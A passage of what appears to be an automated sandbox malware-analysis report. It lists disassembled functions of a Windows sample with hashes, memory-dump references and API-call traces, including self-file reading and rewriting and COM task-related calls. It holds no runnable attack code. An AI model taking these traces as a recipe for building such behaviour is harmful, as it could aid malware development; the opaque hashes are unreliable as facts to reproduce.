                                                                                                                                                                                                                • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                                Function 00443C00 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                                • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                                Function 004416D0 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                                • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                                Function 00408FA0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                                • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                                Function 0043AC30 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                                • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                                Function 00440880 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                                • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                                Function 0044A8A0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                                • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                                Function 0043C0D0 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                                • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                                Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                                • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                                Function 0044E613 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                • Instruction ID: e1d19a3f0243f14b79b01c451a6d6cb00abb7833888d4a0596576d76429fa551
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E81C5319893918BC795DF38C8D65D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                                Function 0043CC10 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                                • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                                Function 0040ED30 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                                • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                                Function 0043CA30 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                                • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                                Function 0040EF50 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                                • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                                Function 0042EB80 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                                • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                                Function 004147E0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                                • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                                Function 00414050 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                                • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                                Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                                Function 00403699 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                                • API String ID: 3028510665-3742188657
                                                                                                                                                                                                                • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                                Function 00403050 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00403060
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                  • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                  • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                  • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                                Strings
